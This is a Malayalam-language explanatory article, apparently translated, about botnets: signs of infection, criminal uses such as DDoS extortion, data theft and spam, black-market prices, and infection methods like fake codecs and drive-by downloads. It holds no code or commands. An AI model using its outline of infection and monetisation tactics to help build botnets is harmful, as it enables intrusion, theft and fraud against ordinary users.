ബോട്ട്‌നെറ്റുകൾ. ഞങ്ങൾ ഞങ്ങളുടെ സ്വന്തം കോംബാറ്റ് ബോട്ട്നെറ്റ് സൃഷ്ടിക്കുന്നു. എന്റെ കമ്പ്യൂട്ടറിൽ ബോട്ട് ബാധിച്ചിട്ടുണ്ടോ

ഇന്ന്, സൈബർ കുറ്റവാളികളുടെ പ്രധാന ഉപകരണങ്ങളിലൊന്നായി ബോട്ട്നെറ്റുകൾ മാറിയിരിക്കുന്നു. എന്താണ് ബോട്ട്‌നെറ്റുകൾ, അവ എങ്ങനെ പ്രവർത്തിക്കുന്നു, ഒരു സോംബി നെറ്റ്‌വർക്കിൽ പ്രവേശിക്കുന്നതിൽ നിന്ന് നിങ്ങളുടെ കമ്പ്യൂട്ടറിനെ എങ്ങനെ സംരക്ഷിക്കാമെന്നും കമ്പ്യൂട്ടർബിൽഡ് നിങ്ങളോട് പറയും.

ഒരു ബോട്ട്‌നെറ്റ്, അല്ലെങ്കിൽ സോംബി നെറ്റ്‌വർക്ക്, മാൽവെയർ ബാധിച്ച കമ്പ്യൂട്ടറുകളുടെ ഒരു ശൃംഖലയാണ്, അത് ആക്രമണകാരികളെ അവരുടെ ഉടമസ്ഥരുടെ അറിവില്ലാതെ മറ്റുള്ളവരുടെ മെഷീനുകൾ വിദൂരമായി നിയന്ത്രിക്കാൻ അനുവദിക്കുന്നു. സമീപ വർഷങ്ങളിൽ, സോംബി നെറ്റ്‌വർക്കുകൾ സൈബർ കുറ്റവാളികളുടെ സ്ഥിരമായ വരുമാന സ്രോതസ്സായി മാറിയിരിക്കുന്നു. സ്ഥിരമായി കുറഞ്ഞ ചിലവുകളും ബോട്ട്‌നെറ്റുകൾ നിയന്ത്രിക്കുന്നതിന് ആവശ്യമായ ഏറ്റവും കുറഞ്ഞ അറിവും ജനപ്രീതിയിലെ വളർച്ചയ്ക്ക് കാരണമാകുന്നു, അതിനാൽ ബോട്ട്‌നെറ്റുകളുടെ എണ്ണവും. DDoS ആക്രമണങ്ങൾ അല്ലെങ്കിൽ സോംബി നെറ്റ്‌വർക്കുകൾ ഉപയോഗിച്ച് നടത്തുന്ന സ്പാം മെയിലിംഗുകൾ, ആക്രമണകാരികളും അവരുടെ ഉപഭോക്താക്കളും ആയിരക്കണക്കിന് ഡോളർ സമ്പാദിക്കുന്നു.

എന്റെ കമ്പ്യൂട്ടറിൽ ബോട്ട് ബാധിച്ചിട്ടുണ്ടോ?

ഈ ചോദ്യത്തിന് ഉത്തരം നൽകുന്നത് എളുപ്പമല്ല. ഒരു പിസിയുടെ ദൈനംദിന പ്രവർത്തനത്തിൽ ബോട്ടുകളുടെ ഇടപെടൽ ട്രാക്കുചെയ്യുന്നത് മിക്കവാറും അസാധ്യമാണ് എന്നതാണ് വസ്തുത, കാരണം ഇത് സിസ്റ്റത്തിന്റെ പ്രകടനത്തെ ഒരു തരത്തിലും ബാധിക്കില്ല. എന്നിരുന്നാലും, സിസ്റ്റത്തിൽ ഒരു ബോട്ട് ഉണ്ടെന്ന് നിങ്ങൾക്ക് നിർണ്ണയിക്കാൻ കഴിയുന്ന നിരവധി അടയാളങ്ങളുണ്ട്:

അജ്ഞാത പ്രോഗ്രാമുകൾ ഇന്റർനെറ്റിലേക്ക് കണക്റ്റുചെയ്യാൻ ശ്രമിക്കുന്നു, ഇത് ഫയർവാൾ അല്ലെങ്കിൽ ആന്റി-വൈറസ് സോഫ്‌റ്റ്‌വെയർ ഇടയ്‌ക്കിടെ രോഷാകുലമായി റിപ്പോർട്ട് ചെയ്യുന്നു;

നിങ്ങൾ വെബ് വളരെ മിതമായ രീതിയിലാണ് ഉപയോഗിക്കുന്നതെങ്കിലും ഇന്റർനെറ്റ് ട്രാഫിക് വളരെ ഉയർന്നതാണ്;

പ്രവർത്തിക്കുന്ന സിസ്റ്റം പ്രോസസ്സുകളുടെ പട്ടികയിൽ പുതിയവ പ്രത്യക്ഷപ്പെടുന്നു, സാധാരണ വിൻഡോസ് പ്രോസസ്സുകളായി വേഷമിടുന്നു (ഉദാഹരണത്തിന്, ബോട്ടിനെ scvhost.exe എന്ന് വിളിക്കാം - ഈ പേര് വിൻഡോസ് സിസ്റ്റം പ്രോസസ്സിന്റെ പേരുമായി വളരെ സാമ്യമുള്ളതാണ്; ഇത് വളരെ ബുദ്ധിമുട്ടാണ്. വ്യത്യാസം ശ്രദ്ധിക്കാൻ, പക്ഷേ അത് സാധ്യമാണ്).

എന്തുകൊണ്ടാണ് ബോട്ട്നെറ്റുകൾ സൃഷ്ടിക്കുന്നത്?

പണം സമ്പാദിക്കാൻ വേണ്ടിയാണ് ബോട്ട്‌നെറ്റുകൾ സൃഷ്ടിക്കുന്നത്. സോംബി നെറ്റ്‌വർക്കുകളുടെ വാണിജ്യപരമായി ലാഭകരമായ ഉപയോഗത്തിന് നിരവധി മേഖലകളുണ്ട്: DDoS ആക്രമണങ്ങൾ, രഹസ്യ വിവരങ്ങളുടെ ശേഖരണം, സ്‌പാമിംഗ്, ഫിഷിംഗ്, സെർച്ച് എഞ്ചിൻ സ്പാം, തട്ടിപ്പ് ക്ലിക്ക് കൗണ്ടറുകൾ മുതലായവ. ഏത് ആക്രമണകാരി തിരഞ്ഞെടുത്താലും ഏത് ദിശയും ലാഭകരമാകുമെന്നത് ശ്രദ്ധിക്കേണ്ടതാണ്. , കൂടാതെ ഒരു ബോട്ട്നെറ്റ് ഈ പ്രവർത്തനങ്ങളെല്ലാം ഒരേസമയം നടപ്പിലാക്കാൻ അനുവദിക്കുന്നു.

ഒരു DDoS ആക്രമണം (ഇംഗ്ലീഷ് ഡിസ്ട്രിബ്യൂട്ടഡ് ഡിനയൽ-ഓഫ്-സർവീസിൽ നിന്ന്) ഒരു വെബ്‌സൈറ്റ് പോലുള്ള ഒരു കമ്പ്യൂട്ടർ സിസ്റ്റത്തിന് നേരെയുള്ള ആക്രമണമാണ്, അതിന്റെ ഉദ്ദേശ്യം സിസ്റ്റത്തെ "വീഴ്‌ച" എന്നതിലേക്ക് കൊണ്ടുവരിക എന്നതാണ്, അതായത്, അതിന് കഴിയുന്ന അവസ്ഥയിലേക്ക്. നിയമാനുസൃത ഉപയോക്താക്കളുടെ അഭ്യർത്ഥനകൾ സ്വീകരിക്കുകയും പ്രോസസ്സ് ചെയ്യുകയും ചെയ്യുന്നില്ല. ഇരയായ കമ്പ്യൂട്ടറിലേക്കോ സൈറ്റിലേക്കോ ഒന്നിലധികം അഭ്യർത്ഥനകൾ അയയ്‌ക്കുക എന്നതാണ് DDoS ആക്രമണം നടത്തുന്നതിനുള്ള ഏറ്റവും സാധാരണമായ രീതികളിലൊന്ന്, ഇത് എല്ലാ ഇൻകമിംഗ് അഭ്യർത്ഥനകളും പ്രോസസ്സ് ചെയ്യുന്നതിന് ആക്രമിക്കപ്പെട്ട കമ്പ്യൂട്ടറിന്റെ ഉറവിടങ്ങൾ പര്യാപ്തമല്ലെങ്കിൽ സേവനം നിരസിക്കുന്നതിലേക്ക് നയിക്കുന്നു. DDoS ആക്രമണങ്ങൾ ഹാക്കർമാർക്കുള്ള ശക്തമായ ആയുധമാണ്, അവ നടപ്പിലാക്കുന്നതിനുള്ള മികച്ച ഉപകരണമാണ് ബോട്ട്നെറ്റ്.

DDoS ആക്രമണങ്ങൾ അന്യായമായ മത്സരത്തിന്റെയും സൈബർ ഭീകരതയുടെയും ഒരു മാർഗമായിരിക്കാം. ഒരു ബോട്ട്നെറ്റിന്റെ ഉടമയ്ക്ക് വളരെ സൂക്ഷ്മതയില്ലാത്ത ഏതൊരു സംരംഭകനും ഒരു സേവനം നൽകാൻ കഴിയും - തന്റെ എതിരാളിയുടെ സൈറ്റിൽ ഒരു DDoS ആക്രമണം നടത്താൻ. അത്തരമൊരു ലോഡിന് ശേഷം ആക്രമിക്കപ്പെട്ട റിസോഴ്സ് "താഴേക്ക് വീഴും", ആക്രമണത്തിന്റെ ഉപഭോക്താവിന് ഒരു താൽക്കാലിക നേട്ടം ലഭിക്കും, കൂടാതെ സൈബർ കുറ്റവാളികൾക്ക് മിതമായ (അല്ലെങ്കിൽ അങ്ങനെയല്ല) പ്രതിഫലം ലഭിക്കും.

അതുപോലെ തന്നെ, ബോട്ട്നെറ്റ് ഉടമകൾക്ക് തന്നെ DDoS ആക്രമണങ്ങൾ ഉപയോഗിച്ച് വലിയ കമ്പനികളിൽ നിന്ന് പണം തട്ടിയെടുക്കാം. അതേസമയം, വിജയകരമായ DDoS ആക്രമണങ്ങളുടെ അനന്തരഫലങ്ങൾ ഇല്ലാതാക്കുന്നത് വളരെ ചെലവേറിയതിനാൽ, സൈബർ കുറ്റവാളികളുടെ ആവശ്യകതകൾ പാലിക്കാൻ കമ്പനികൾ താൽപ്പര്യപ്പെടുന്നു. ഉദാഹരണത്തിന്, 2009 ജനുവരിയിൽ, ഏറ്റവും വലിയ ഹോസ്റ്റുകളിലൊന്നായ GoDaddy.com ഒരു DDoS ആക്രമണത്തിന് വിധേയമായി, അതിന്റെ ഫലമായി അതിന്റെ സെർവറുകളിൽ ഹോസ്റ്റ് ചെയ്‌ത ആയിരക്കണക്കിന് സൈറ്റുകൾ ഏകദേശം ഒരു ദിവസത്തേക്ക് ലഭ്യമല്ല. ഹോസ്റ്ററുടെ സാമ്പത്തിക നഷ്ടം വളരെ വലുതായിരുന്നു.

2007 ഫെബ്രുവരിയിൽ, റൂട്ട് ഡിഎൻഎസ് സെർവറുകളിൽ നിരവധി ആക്രമണങ്ങൾ നടത്തി, ഇതിന്റെ പ്രവർത്തനം മുഴുവൻ ഇന്റർനെറ്റിന്റെയും സാധാരണ പ്രവർത്തനത്തെ നേരിട്ട് ബാധിക്കുന്നു. ഈ ആക്രമണങ്ങളുടെ ലക്ഷ്യം വേൾഡ് വൈഡ് വെബിന്റെ തകർച്ചയായിരിക്കാൻ സാധ്യതയില്ല, കാരണം ഇന്റർനെറ്റ് നിലവിലിരിക്കുകയും സാധാരണയായി പ്രവർത്തിക്കുകയും ചെയ്താൽ മാത്രമേ സോംബി നെറ്റ്‌വർക്കുകളുടെ നിലനിൽപ്പ് സാധ്യമാകൂ. എല്ലാറ്റിനുമുപരിയായി, ഇത് സോംബി നെറ്റ്‌വർക്കുകളുടെ ശക്തിയുടെയും കഴിവുകളുടെയും പ്രകടനം പോലെയായിരുന്നു.

DDoS ആക്രമണങ്ങൾ നടപ്പിലാക്കുന്നതിനുള്ള സേവനങ്ങളുടെ പരസ്യം പ്രസക്തമായ വിഷയങ്ങളിൽ പല ഫോറങ്ങളിലും പരസ്യമായി പോസ്റ്റുചെയ്യുന്നു. ഒരു DDoS ബോട്ട്‌നെറ്റിന്റെ തുടർച്ചയായ പ്രവർത്തനത്തിന്റെ പ്രതിദിനം 50 മുതൽ ആയിരക്കണക്കിന് ഡോളർ വരെയാണ് ആക്രമണങ്ങളുടെ വില. www.shadowserver.org എന്ന സൈറ്റ് അനുസരിച്ച്, 2008-ൽ ഏകദേശം 190,000 DDoS ആക്രമണങ്ങൾ ഉണ്ടായി, അതിൽ നിന്ന് സൈബർ കുറ്റവാളികൾ ഏകദേശം 20 ദശലക്ഷം ഡോളർ സമ്പാദിച്ചു. സ്വാഭാവികമായും, ഈ തുകയിൽ ബ്ലാക്ക്മെയിലിൽ നിന്നുള്ള വരുമാനം ഉൾപ്പെടുന്നില്ല, അത് കണക്കാക്കുന്നത് അസാധ്യമാണ്.

രഹസ്യ വിവരങ്ങളുടെ ശേഖരണം

ഉപയോക്താക്കളുടെ കമ്പ്യൂട്ടറുകളിൽ സൂക്ഷിച്ചിരിക്കുന്ന രഹസ്യ വിവരങ്ങൾ എപ്പോഴും നുഴഞ്ഞുകയറ്റക്കാരെ ആകർഷിക്കും. ക്രെഡിറ്റ് കാർഡ് നമ്പറുകൾ, സാമ്പത്തിക വിവരങ്ങൾ, വിവിധ സേവനങ്ങൾക്കുള്ള പാസ്‌വേഡുകൾ എന്നിവയാണ് ഏറ്റവും താൽപ്പര്യമുള്ളത്: മെയിൽബോക്‌സുകൾ, എഫ്‌ടിപി സെർവറുകൾ, തൽക്ഷണ സന്ദേശവാഹകർ മുതലായവ. അതേ സമയം, ആക്രമണകാരികൾക്ക് താൽപ്പര്യമുള്ള ഡാറ്റ കൃത്യമായി തിരഞ്ഞെടുക്കാൻ ആധുനിക മാൽവെയർ അനുവദിക്കുന്നു - അത് അപ്‌ലോഡ് ചെയ്യുക PC അനുബന്ധ മൊഡ്യൂളിലേക്ക്.

അക്രമികൾക്ക് മോഷ്ടിച്ച വിവരങ്ങൾ വിൽക്കുകയോ അല്ലെങ്കിൽ അവരുടെ നേട്ടത്തിനായി ഉപയോഗിക്കുകയോ ചെയ്യാം. വെബിലെ നിരവധി ഫോറങ്ങളിൽ ഓരോ ദിവസവും ബാങ്ക് അക്കൗണ്ടുകൾ വിൽക്കുന്നതിനുള്ള നൂറുകണക്കിന് പരസ്യങ്ങൾ പ്രത്യക്ഷപ്പെടുന്നു. ഒരു അക്കൗണ്ടിന്റെ വില ഉപയോക്താവിന്റെ അക്കൗണ്ടിലെ പണത്തിന്റെ അളവിനെ ആശ്രയിച്ചിരിക്കുന്നു, ഓരോ അക്കൗണ്ടിനും $1 മുതൽ $1,500 വരെയാണ്. മത്സരത്തിന്റെ ഗതിയിൽ, ഇത്തരത്തിലുള്ള ബിസിനസ്സിൽ ഏർപ്പെട്ടിരിക്കുന്ന സൈബർ കുറ്റവാളികൾ വില കുറയ്ക്കാൻ നിർബന്ധിതരാകുന്നു എന്നാണ് താഴ്ന്ന പരിധി സൂചിപ്പിക്കുന്നത്. ശരിക്കും ധാരാളം പണം സമ്പാദിക്കാൻ, അവർക്ക് പുതിയ ഡാറ്റയുടെ സ്ഥിരമായ ഒഴുക്ക് ആവശ്യമാണ്, ഇതിന് സോംബി നെറ്റ്‌വർക്കുകളുടെ സ്ഥിരമായ വളർച്ച ആവശ്യമാണ്. കാർഡറുകൾക്ക് സാമ്പത്തിക വിവരങ്ങളിൽ പ്രത്യേക താൽപ്പര്യമുണ്ട് - കള്ളപ്പണം ബാങ്ക് കാർഡുകളിൽ ഉൾപ്പെട്ടിരിക്കുന്ന നുഴഞ്ഞുകയറ്റക്കാർ.

രണ്ട് വർഷം മുമ്പ് അറസ്റ്റിലായ ഒരു കൂട്ടം ബ്രസീലിയൻ സൈബർ കുറ്റവാളികളുടെ അറിയപ്പെടുന്ന കഥയിലൂടെ അത്തരം പ്രവർത്തനങ്ങൾ എത്രത്തോളം ലാഭകരമാണെന്ന് വിലയിരുത്താനാകും. കമ്പ്യൂട്ടറുകളിൽ നിന്ന് മോഷ്ടിച്ച വിവരങ്ങൾ ഉപയോഗിച്ച് സാധാരണ ഉപയോക്താക്കളുടെ ബാങ്ക് അക്കൗണ്ടിൽ നിന്ന് 4.74 ദശലക്ഷം ഡോളർ പിൻവലിക്കാൻ അവർക്ക് കഴിഞ്ഞു. വ്യാജ രേഖകൾ ചമയ്ക്കൽ, വ്യാജ ബാങ്ക് അക്കൗണ്ട് തുറക്കൽ, നിയമവിരുദ്ധ ഇടപാടുകൾ തുടങ്ങിയവയിൽ ഏർപ്പെട്ടിരിക്കുന്ന കുറ്റവാളികൾക്കും ഉപയോക്താവിന്റെ പണവുമായി നേരിട്ട് ബന്ധമില്ലാത്ത വ്യക്തിഗത ഡാറ്റ നേടുന്നതിലും താൽപ്പര്യമുണ്ട്.

ബോട്ട്‌നെറ്റുകൾ ശേഖരിക്കുന്ന മറ്റൊരു തരം വിവരങ്ങൾ ഇമെയിൽ വിലാസങ്ങളാണ്, കൂടാതെ ക്രെഡിറ്റ് കാർഡ് നമ്പറുകൾ, അക്കൗണ്ട് നമ്പറുകൾ എന്നിവയിൽ നിന്ന് വ്യത്യസ്തമായി, രോഗബാധിതനായ ഒരു PC-യുടെ വിലാസ പുസ്തകത്തിൽ നിന്ന് നിരവധി ഇമെയിൽ വിലാസങ്ങൾ വേർതിരിച്ചെടുക്കാൻ കഴിയും. ശേഖരിച്ച വിലാസങ്ങൾ വിൽപ്പനയ്‌ക്ക് വയ്ക്കുന്നു, ചിലപ്പോൾ "ഭാരം അനുസരിച്ച്" - ഒരു മെഗാബൈറ്റിന്. അത്തരമൊരു "ഉൽപ്പന്നത്തിന്റെ" പ്രധാന വാങ്ങുന്നവർ സ്പാമർമാരാണ്. ഒരു ദശലക്ഷം ഇ-മെയിൽ വിലാസങ്ങളുടെ ഒരു ലിസ്റ്റ് 20 മുതൽ 100 ​​ഡോളർ വരെ ചിലവാകും, അതേ മില്യൺ വിലാസങ്ങളിലേക്ക് സ്‌പാമർമാർക്ക് മെയിലിംഗിന് 150-200 ഡോളർ വിലവരും. പ്രയോജനം വ്യക്തമാണ്.

വിവിധ പണമടച്ചുള്ള സേവനങ്ങളുടെയും ഓൺലൈൻ സ്റ്റോറുകളുടെയും അക്കൗണ്ടുകളിലും കുറ്റവാളികൾക്ക് താൽപ്പര്യമുണ്ട്. അവ തീർച്ചയായും ബാങ്ക് അക്കൗണ്ടുകളേക്കാൾ വിലകുറഞ്ഞതാണ്, എന്നാൽ അവ നടപ്പിലാക്കുന്നത് നിയമപാലകരുടെ ഉപദ്രവത്തിന്റെ കുറഞ്ഞ അപകടസാധ്യതയുമായി ബന്ധപ്പെട്ടിരിക്കുന്നു.

ദശലക്ഷക്കണക്കിന് സ്പാം സന്ദേശങ്ങൾ ദിവസവും ലോകമെമ്പാടും പ്രചരിക്കുന്നു. ആവശ്യപ്പെടാത്ത മെയിൽ അയക്കുന്നത് ആധുനിക ബോട്ട്‌നെറ്റുകളുടെ പ്രധാന പ്രവർത്തനങ്ങളിലൊന്നാണ്. Kaspersky Lab അനുസരിച്ച്, എല്ലാ സ്പാമുകളുടെയും 80% സോംബി നെറ്റ്‌വർക്കുകൾ വഴിയാണ് അയയ്ക്കുന്നത്. നിയമം അനുസരിക്കുന്ന ഉപയോക്താക്കളുടെ കമ്പ്യൂട്ടറുകളിൽ നിന്ന് കോടിക്കണക്കിന് കത്തുകൾ വയാഗ്രയുടെ പരസ്യങ്ങൾ, വിലകൂടിയ വാച്ചുകളുടെ പകർപ്പുകൾ, ഓൺലൈൻ കാസിനോകൾ മുതലായവ, ആശയവിനിമയ ചാനലുകളും മെയിൽബോക്സുകളും തടസ്സപ്പെടുത്തുന്നു. ഈ രീതിയിൽ, ഹാക്കർമാർ നിരപരാധികളായ ഉപയോക്താക്കളുടെ കമ്പ്യൂട്ടറുകളെ അപകടത്തിലാക്കുന്നു: മെയിൽ അയയ്‌ക്കുന്ന വിലാസങ്ങൾ ആന്റിവൈറസ് കമ്പനികൾ ബ്ലാക്ക്‌ലിസ്റ്റ് ചെയ്യുന്നു.

സമീപ വർഷങ്ങളിൽ, സ്പാം സേവനങ്ങളുടെ വ്യാപ്തി വിപുലീകരിച്ചു: ICQ സ്പാം, സോഷ്യൽ നെറ്റ്വർക്കുകളിൽ സ്പാം, ഫോറങ്ങൾ, ബ്ലോഗുകൾ എന്നിവ പ്രത്യക്ഷപ്പെട്ടു. ഇത് ബോട്ട്നെറ്റ് ഉടമകളുടെ "മെറിറ്റ്" കൂടിയാണ്: എല്ലാത്തിനുമുപരി, "ഫേസ്ബുക്കിലെ സ്പാം" പോലുള്ള മുദ്രാവാക്യങ്ങളുള്ള ഒരു പുതിയ ബിസിനസ്സിനായി ചക്രവാളങ്ങൾ തുറക്കുന്ന ബോട്ട് ക്ലയന്റിലേക്ക് ഒരു അധിക മൊഡ്യൂൾ ചേർക്കുന്നത് ബുദ്ധിമുട്ടുള്ള കാര്യമല്ല. ചെലവുകുറഞ്ഞത്." ടാർഗെറ്റ് പ്രേക്ഷകരെയും അയച്ച വിലാസങ്ങളുടെ എണ്ണത്തെയും ആശ്രയിച്ച് സ്പാം വിലകൾ വ്യത്യാസപ്പെടുന്നു. ലക്ഷക്കണക്കിന് വിലാസങ്ങൾക്ക് $70 മുതൽ ദശലക്ഷക്കണക്കിന് വിലാസങ്ങൾക്ക് $1,000 വരെയാണ് ടാർഗെറ്റുചെയ്‌ത മെയിലിംഗുകളുടെ വിലകളുടെ പരിധി. കഴിഞ്ഞ ഒരു വർഷത്തിനിടെ, ഇമെയിലുകൾ അയച്ചുകൊണ്ട് സ്പാമർമാർ ഏകദേശം 780 മില്യൺ ഡോളർ സമ്പാദിച്ചു.

തിരയൽ സ്പാം സൃഷ്ടിക്കുക

ബോട്ട്‌നെറ്റുകൾ ഉപയോഗിക്കുന്നതിനുള്ള മറ്റൊരു ഓപ്ഷൻ സെർച്ച് എഞ്ചിനുകളിൽ സൈറ്റുകളുടെ ജനപ്രീതി വർദ്ധിപ്പിക്കുക എന്നതാണ്. തിരയൽ എഞ്ചിൻ ഒപ്റ്റിമൈസേഷനിൽ പ്രവർത്തിക്കുമ്പോൾ, റിസോഴ്സ് അഡ്മിനിസ്ട്രേറ്റർമാർ തിരയൽ ഫലങ്ങളിൽ സൈറ്റിന്റെ സ്ഥാനം വർദ്ധിപ്പിക്കാൻ ശ്രമിക്കുന്നു, കാരണം അത് ഉയർന്നതാണെങ്കിൽ, കൂടുതൽ സന്ദർശകർ സെർച്ച് എഞ്ചിനുകൾ വഴി സൈറ്റിലേക്ക് വരും, അതിനാൽ, സൈറ്റ് ഉടമയ്ക്ക് കൂടുതൽ വരുമാനം ലഭിക്കും. ഉദാഹരണത്തിന്, വെബ് പേജുകളിലെ പരസ്യ സ്ഥലത്തിന്റെ വിൽപ്പനയിൽ നിന്ന് സ്വീകരിക്കുക. "സെർച്ച് എഞ്ചിനുകളിൽ" സൈറ്റിനെ ഒന്നാം സ്ഥാനത്തേക്ക് കൊണ്ടുവരാൻ പല കമ്പനികളും വെബ്‌മാസ്റ്റർമാർക്ക് ധാരാളം പണം നൽകുന്നു. ബോട്ട്നെറ്റ് ഉടമകൾ അവരുടെ ചില തന്ത്രങ്ങൾ ചാരപ്പണി ചെയ്യുകയും സെർച്ച് എഞ്ചിൻ ഒപ്റ്റിമൈസേഷൻ പ്രക്രിയ ഓട്ടോമേറ്റ് ചെയ്യുകയും ചെയ്തു.

ലൈവ് ജേണലിലെ നിങ്ങളുടെ എൻട്രിയുടെ കമന്റുകളിലോ ഒരു ഫോട്ടോ ഹോസ്റ്റിംഗിൽ പോസ്റ്റ് ചെയ്ത വിജയകരമായ ഫോട്ടോയോ കാണുമ്പോൾ, നിങ്ങൾക്ക് അജ്ഞാതനായ ഒരു വ്യക്തിയും ചിലപ്പോൾ നിങ്ങളുടെ "സുഹൃത്ത്" സൃഷ്‌ടിച്ച ധാരാളം ലിങ്കുകളും - ആശ്ചര്യപ്പെടേണ്ടതില്ല: ഒരാൾ ഇപ്പോൾ ഓർഡർ ചെയ്തു ബോട്ട്‌നെറ്റ് ഉടമകൾക്ക് അവരുടെ വിഭവത്തിന്റെ പ്രമോഷൻ. പ്രത്യേകം സൃഷ്‌ടിച്ച ഒരു പ്രോഗ്രാം ഒരു സോംബി കമ്പ്യൂട്ടറിൽ ലോഡുചെയ്‌തു, അതിന്റെ ഉടമയെ പ്രതിനിധീകരിച്ച്, പ്രമോട്ടുചെയ്യുന്ന സൈറ്റിലേക്കുള്ള ലിങ്കുകളുള്ള ജനപ്രിയ ഉറവിടങ്ങളിൽ അഭിപ്രായങ്ങൾ ഇടുന്നു. നിയമവിരുദ്ധമായ തിരയൽ സ്പാം സേവനങ്ങളുടെ ശരാശരി വില പ്രതിമാസം ഏകദേശം $300 ആണ്.

വ്യക്തിഗത ഡാറ്റയുടെ വില എത്രയാണ്

മോഷ്ടിച്ച വ്യക്തിഗത ഡാറ്റയുടെ വില നേരിട്ട് അവരുടെ യഥാർത്ഥ ഉടമ താമസിക്കുന്ന രാജ്യത്തെ ആശ്രയിച്ചിരിക്കുന്നു. ഉദാഹരണത്തിന്, യുഎസ് റസിഡന്റ്സിന്റെ മുഴുവൻ ഡാറ്റയും $ 5-8 ആണ്. കരിഞ്ചന്തയിൽ, യൂറോപ്യൻ യൂണിയനിലെ താമസക്കാരിൽ നിന്നുള്ള ഡാറ്റ പ്രത്യേകിച്ചും വിലമതിക്കുന്നു - ഇത് യുണൈറ്റഡ് സ്റ്റേറ്റ്സിലെയും കാനഡയിലെയും പൗരന്മാരിൽ നിന്നുള്ള ഡാറ്റയേക്കാൾ രണ്ടോ മൂന്നോ മടങ്ങ് ചെലവേറിയതാണ്. കുറ്റവാളികൾക്ക് യൂറോപ്യൻ യൂണിയന്റെ ഭാഗമായ ഏത് രാജ്യത്തും ഇത്തരം ഡാറ്റ ഉപയോഗിക്കാമെന്ന വസ്തുത ഇത് വിശദീകരിക്കാം. ശരാശരി, ലോകമെമ്പാടുമുള്ള ഒരു വ്യക്തിയെക്കുറിച്ചുള്ള ഒരു സമ്പൂർണ്ണ ഡാറ്റ പാക്കേജിന്റെ വില ഏകദേശം $7 ആണ്.

നിർഭാഗ്യവശാൽ, ആദ്യം മുതൽ ഒരു ബോട്ട്നെറ്റ് സംഘടിപ്പിക്കാൻ തീരുമാനിച്ച ഒരാൾക്ക്, ഒരു സോംബി നെറ്റ്‌വർക്ക് സൃഷ്ടിക്കുന്നതിനുള്ള നിർദ്ദേശങ്ങൾ ഇന്റർനെറ്റിൽ കണ്ടെത്തുന്നത് ബുദ്ധിമുട്ടുള്ള കാര്യമല്ല. ആദ്യ ഘട്ടം: ഒരു പുതിയ സോംബി നെറ്റ്‌വർക്ക് സൃഷ്‌ടിക്കുക. ഇത് ചെയ്യുന്നതിന്, നിങ്ങൾ ഒരു പ്രത്യേക പ്രോഗ്രാം ഉപയോഗിച്ച് ഉപയോക്താക്കളുടെ കമ്പ്യൂട്ടറുകളെ ബാധിക്കേണ്ടതുണ്ട് - ഒരു ബോട്ട്. സ്പാം മെയിലിംഗുകൾ, ഫോറങ്ങളിലും സോഷ്യൽ നെറ്റ്‌വർക്കുകളിലും സന്ദേശങ്ങൾ പോസ്റ്റുചെയ്യൽ, മറ്റ് രീതികൾ എന്നിവ ബാധിക്കാൻ ഉപയോഗിക്കുന്നു; പലപ്പോഴും ബോട്ടിന് വൈറസുകൾ അല്ലെങ്കിൽ പുഴുക്കൾ പോലെയുള്ള സ്വയം-പ്രചരണത്തിന്റെ പ്രവർത്തനമുണ്ട്.

ഒരു ബോട്ട് ഇൻസ്റ്റാൾ ചെയ്യാൻ സാധ്യതയുള്ള ഇരയെ നിർബന്ധിക്കാൻ, സോഷ്യൽ എഞ്ചിനീയറിംഗ് ടെക്നിക്കുകൾ ഉപയോഗിക്കുന്നു. ഉദാഹരണത്തിന്, ഒരു പ്രത്യേക കോഡെക് ഡൗൺലോഡ് ചെയ്യേണ്ട രസകരമായ ഒരു വീഡിയോ കാണാൻ അവർ വാഗ്ദാനം ചെയ്യുന്നു. അത്തരമൊരു ഫയൽ ഡൌൺലോഡ് ചെയ്ത് പ്രവർത്തിപ്പിച്ചതിന് ശേഷം, ഉപയോക്താവിന് തീർച്ചയായും ഒരു വീഡിയോയും കാണാൻ കഴിയില്ല, മിക്കവാറും മാറ്റങ്ങളൊന്നും ശ്രദ്ധിക്കില്ല, കൂടാതെ അവന്റെ പിസി രോഗബാധിതനാകുകയും എല്ലാ കമാൻഡുകളും നടപ്പിലാക്കുന്ന ഒരു എളിയ സേവകനാകുകയും ചെയ്യും. ബോട്ട്നെറ്റ് മാസ്റ്റർ.

രണ്ടാമത്തെ വ്യാപകമായി ഉപയോഗിക്കുന്ന ബോട്ട് അണുബാധ രീതി ഡ്രൈവ്-ബൈ ഡൗൺലോഡ് ആണ്. ഒരു ഉപയോക്താവ് രോഗബാധിതമായ ഒരു വെബ് പേജ് സന്ദർശിക്കുമ്പോൾ, ആപ്ലിക്കേഷനുകളിലെ വിവിധ "ദ്വാരങ്ങൾ" വഴി അവന്റെ കമ്പ്യൂട്ടറിലേക്ക് ക്ഷുദ്ര കോഡ് ഡൗൺലോഡ് ചെയ്യപ്പെടുന്നു - പ്രാഥമികമായി ജനപ്രിയ ബ്രൗസറുകളിൽ. ദുർബലമായ പോയിന്റുകൾ ചൂഷണം ചെയ്യാൻ, പ്രത്യേക പ്രോഗ്രാമുകൾ - ചൂഷണങ്ങൾ ഉപയോഗിക്കുന്നു. നിശബ്ദമായി ഡൌൺലോഡ് ചെയ്യാൻ മാത്രമല്ല, ഒരു വൈറസ് അല്ലെങ്കിൽ ബോട്ട് നിശബ്ദമായി സമാരംഭിക്കാനും അവർ അനുവദിക്കുന്നു. ഇത്തരത്തിലുള്ള ക്ഷുദ്രവെയർ വിതരണം ഏറ്റവും അപകടകരമാണ്, കാരണം ഒരു ജനപ്രിയ ഉറവിടം ഹാക്ക് ചെയ്യപ്പെടുകയാണെങ്കിൽ, പതിനായിരക്കണക്കിന് ഉപയോക്താക്കൾ രോഗബാധിതരാകും!

കമ്പ്യൂട്ടർ ശൃംഖലകൾ വഴി സ്വയം പ്രചരിപ്പിക്കാനുള്ള പ്രവർത്തനം ബോട്ടിന് നൽകാം. ഉദാഹരണത്തിന്, ലഭ്യമായ എല്ലാ എക്സിക്യൂട്ടബിൾ ഫയലുകളെയും ബാധിക്കുന്നതിലൂടെയോ അല്ലെങ്കിൽ ദുർബലമായ നെറ്റ്‌വർക്ക് കമ്പ്യൂട്ടറുകൾക്കായി തിരയുന്നതിലൂടെയോ ബാധിക്കുന്നതിലൂടെയോ ഇത് വ്യാപിക്കും.

